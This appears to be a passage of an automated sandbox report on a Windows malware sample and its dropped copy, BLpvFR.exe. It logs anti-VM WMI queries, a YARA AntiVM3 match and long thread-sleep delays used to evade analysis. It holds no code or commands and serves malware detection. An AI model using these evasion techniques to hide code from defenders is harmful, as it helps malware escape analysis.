                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: jKqPSehspS.exe PID: 1308, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: BLpvFR.exe PID: 2660, type: MEMORYSTR
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeMemory allocated: 1500000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeMemory allocated: 3250000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeMemory allocated: 3050000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeMemory allocated: 7FD0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeMemory allocated: 8FD0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeMemory allocated: 9180000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeMemory allocated: A180000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeMemory allocated: 1260000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeMemory allocated: 2ED0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeMemory allocated: 2C20000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeMemory allocated: D00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeMemory allocated: 2720000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeMemory allocated: 4720000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeMemory allocated: 7000000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeMemory allocated: 8000000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeMemory allocated: 8190000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeMemory allocated: 9190000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeMemory allocated: 1280000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeMemory allocated: 2DB0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeMemory allocated: 13F0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8632Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 440Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7883Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 820Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeWindow / User API: threadDelayed 4765Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeWindow / User API: threadDelayed 5081Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeWindow / User API: threadDelayed 7748
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeWindow / User API: threadDelayed 2094
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 2344Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5444Thread sleep count: 8632 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5944Thread sleep count: 440 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6396Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 796Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6744Thread sleep time: -10145709240540247s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3356Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep count: 35 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -32281802128991695s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -100000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7288Thread sleep count: 4765 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -99781s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -99641s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -99516s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -99406s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7288Thread sleep count: 5081 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -99297s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -99187s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -99078s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -98969s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -98842s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -98734s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -98625s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -98515s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -98406s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -98297s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -98188s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -98063s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -97938s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -97813s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -97701s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -97594s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -97469s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -97359s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -97250s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -97122s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -96990s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -96859s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -96750s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -96641s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -96531s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -96422s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -96313s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -96203s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -96094s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -95984s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -95875s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -95766s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -95656s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -95547s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -95438s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -95313s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -95188s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -95063s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -94937s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -94828s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -94718s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -94609s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -94500s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -94390s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -94281s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exe TID: 7268Thread sleep time: -94172s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 2708Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep count: 34 > 30
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -31359464925306218s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -100000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -99875s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7528Thread sleep count: 7748 > 30
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7528Thread sleep count: 2094 > 30
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -99766s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -99656s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -99547s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -99438s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -99314s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -99188s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -99078s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -98969s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -98859s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -98750s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -98639s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -98531s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -98422s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -98311s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -98203s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -98094s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -97969s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -97860s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -97735s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -97610s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -97485s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -97360s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -97235s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -97110s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -96985s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -96860s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -96735s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -96610s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -96485s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -96314s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -96013s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -95906s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -95784s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -95672s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -95563s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -95453s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -95344s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -95235s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -95110s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -94985s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -94860s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -94735s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -94609s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -94500s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -94391s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -94281s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -94172s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -94047s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exe TID: 7524Thread sleep time: -93938s >= -30000s
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 99781Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 99641Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 99516Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 99406Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 99297Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 99187Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 99078Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 98969Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 98842Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 98734Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 98625Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 98515Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 98406Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 98297Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 98188Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 98063Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 97938Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 97813Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 97701Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 97594Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 97469Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 97359Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 97250Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 97122Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 96990Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 96859Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 96750Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 96641Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 96531Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 96422Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 96313Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 96203Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 96094Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 95984Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 95875Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 95766Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 95656Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 95547Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 95438Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 95313Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 95188Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 95063Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 94937Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 94828Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 94718Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 94609Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 94500Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 94390Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 94281Jump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeThread delayed: delay time: 94172Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 100000
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 99875
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 99766
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 99656
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 99547
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 99438
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 99314
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 99188
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 99078
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 98969
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 98859
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 98750
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 98639
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 98531
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 98422
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 98311
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 98203
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 98094
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 97969
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 97860
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 97735
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 97610
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 97485
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 97360
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 97235
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 97110
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 96985
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 96860
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 96735
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 96610
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 96485
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeThread delayed: delay time: 96314
